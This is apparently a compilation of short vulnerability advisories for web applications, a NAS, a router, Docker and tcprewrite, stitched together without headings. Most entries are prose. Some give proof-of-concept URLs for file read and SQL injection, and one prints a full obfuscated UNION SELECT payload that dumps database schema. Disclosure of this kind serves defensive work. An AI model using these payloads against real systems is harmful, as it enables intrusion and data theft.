The vulnerability allows an attacker to arbitrary file read. Proof of Concept: 1 http://localhost/[PATH]/php/file/read.php?filename=[FILE] 2 http://localhost/[PATH]/php/file/readxls.php?filename=[FILE] http://localhost/[PATH]/php/file/PHPReader/temp/[.......].xls Etc..
tcprewrite in Tcpreplay 3.4.4 has a Heap-Based Buffer Overflow vulnerability triggered by a crafted PCAP file can cause a memory corruption and potential code execution.
User controlled input is not sufficiently sanitized and can be exploit by an attacker to get sensitive information (for example, passwords). By sending GET request to the following URI’s with filename= as a parameter, an attacker can trigger the vulnerabilities. By sending GET request to /mobile/download_file2.php an attacker can trigger the vulnerability. The WiseGiga NAS firmware contain pre.php files in the different diretories. By sending GET request to the following URI’s with cmd= as a parameter, an attacker can trigger the vulnerability. The WiseGiga NAS firmware contain pre.php files in the different diretories. By sending POST request to the following URI’s with cmd= as a parameter, an attacker can trigger the vulnerability. The WiseGiga NAS firmware contain pre.php files in the different diretories. By sending GET request to the following URI’s with cmd= as a parameter, an attacker can trigger the vulnerability. The WiseGiga NAS firmware contain default accounts.
Utilizing Docker via unprotected tcp socket (2375/tcp, maybe 2376/tcp with tls but without tls-auth), an attacker can create a Docker container with the '/' path mounted with read/write permissions on the host server that is running the Docker container. As the Docker container executes command as uid 0 it is honored by the host operating system allowing the attacker to edit/create files owned by root. This exploit abuses this to creates a cron job in the '/etc/cron.d/' path of the host server. The Docker image should exist on the target system or be a valid image from hub.docker.com.
This vulnerability in AN1020-25 router enables an anonymous unauthorized attacker to bypass authentication & access Resetting Router to Factory Settings, resulting in un-authorized operation & resetting it to Factory state. It later allows attacker to login to Router's Main Page with default username & password.
This vulnerability allows an attacker to update the admin profile of Nimble Professional - Mobile Marketing Text Blast Web Application 1.0. An attacker can craft a malicious HTML page containing a form with the necessary parameters and submit it to the vulnerable application. This will allow the attacker to update the admin profile with the provided values.
The vulnerability allows an attacker to inject sql commands. Proof of Concept: http://localhost/[PATH]/marketplace?start_date=[SQL]
jRank Topsites Script version 1.0 is vulnerable to Cross-Site Request Forgery (CSRF). An attacker can exploit this vulnerability to perform administrative actions on behalf of the administrator. This can be done by tricking the administrator into clicking a malicious link or visiting a malicious website. The malicious website can contain a crafted HTML form with hidden parameters that will be automatically submitted to the vulnerable application. This can be used to perform administrative actions such as creating a new user, changing the administrator's password, etc.
The vulnerability allows an attacker to inject sql commands into the country, state, city and farm_cat parameters of the business-searchlist page.
The vulnerability allows an attacker to inject sql commands. Proof of Concept: http://localhost/[PATH]/cms.php?id=[SQL] -6'++/*!00002UNION*/+/*!00002SELECT*/+0x31,0x32,0x33,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),0x35,0x36,0x37,0x38,0x39,0x3130,0x3131,0x3132,0x3133,0x3134,0x3135,0x3136,0x3137,0x3138,19,20,0x3231,0x3232--+- http://localhost/[PATH]/contact.php?id=[SQL]
Services By CQR